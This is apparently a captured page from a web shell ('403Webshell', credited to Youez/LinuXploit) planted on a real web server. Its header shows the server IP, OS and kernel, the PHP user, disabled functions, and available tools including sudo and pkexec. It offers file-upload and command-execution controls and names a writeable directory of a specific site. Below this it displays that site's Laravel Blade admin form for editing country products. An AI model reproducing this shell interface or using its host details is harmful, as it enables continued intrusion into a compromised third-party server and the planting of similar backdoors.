403Webshell
Server IP : 103.161.17.216  /  Your IP : 216.73.216.1
Web Server : nginx/1.18.0
System : Linux tipsysaigoncharming 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/thammyviendd.com/resources/views/admin/country/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/thammyviendd.com/resources/views/admin/country/edit_country_product.blade.php
@extends('admin_layout')
 @section('admin_content')
        <div class="row">
            <div class="col-lg-12">
                    <section class="panel">
                        <header class="panel-heading">
                            Cập nhật Quốc Gia 
                        </header>

                        <div class="panel-body">
                            <?php
    $message = Session::get('message');if ($message) {
        echo '<span class="text-alert">',$message,'</span>';
        Session::put('message',null);
            // code...
        }
        // code...
    
    ?>
                            <div class="position-center">
                         
                                <form role="form" action="{{URL::to('/update-country-product/'.$edit_country_product->country_id)}}" method="post">
                                    {{csrf_field()}}

                                <div class="form-group">
                                    <label for="exampleInputEmail1">Tên Quốc Gia</label>
                                    <input type="text" value="{{$edit_country_product->country_name}}" name ="country_product_name"class="form-control" id="title"  onkeyup="ChangeToSlug();" placeholder="Tên danh mục">
                                </div>
                                <div class="form-group">
                                    <label for="exampleInputEmail1">Slug</label>
                                    <input type="text" value="{{$edit_country_product->slug_country_product}}"name ="slug_country_product"class="form-control" id="slug" placeholder="Tên danh mục">
                                </div>
                                <div class="form-group">
                                    <label for="exampleInputEmail1">Keywords </label>
                                    <input type="text" value="{{$edit_country_product->meta_keywords}}" name ="brand_country_keywords"class="form-control" id="exampleInputEmail1" placeholder="Tên danh mục">
                                </div>
                                <div class="form-group">
                                    <label for="exampleInputPassword1">Mô tả thương hiệuc</label>
                                    <textarea style="resize:none;"  rows= "5"class="form-control"  name="country_product_desc" >{{$edit_country_product->country_desc}}</textarea> 
                                </div>
                                
                                <button type="submit" name="update_country_product"class="btn btn-info">Cập nhật Quốc Gia</button>
                            </form>
                        <!--     </div>
                       
                        </div>
                    </section>

            </div>
            <div class="col-lg-12">

@endsection

Youez - 2016 - github.com/yon3zu
LinuXploit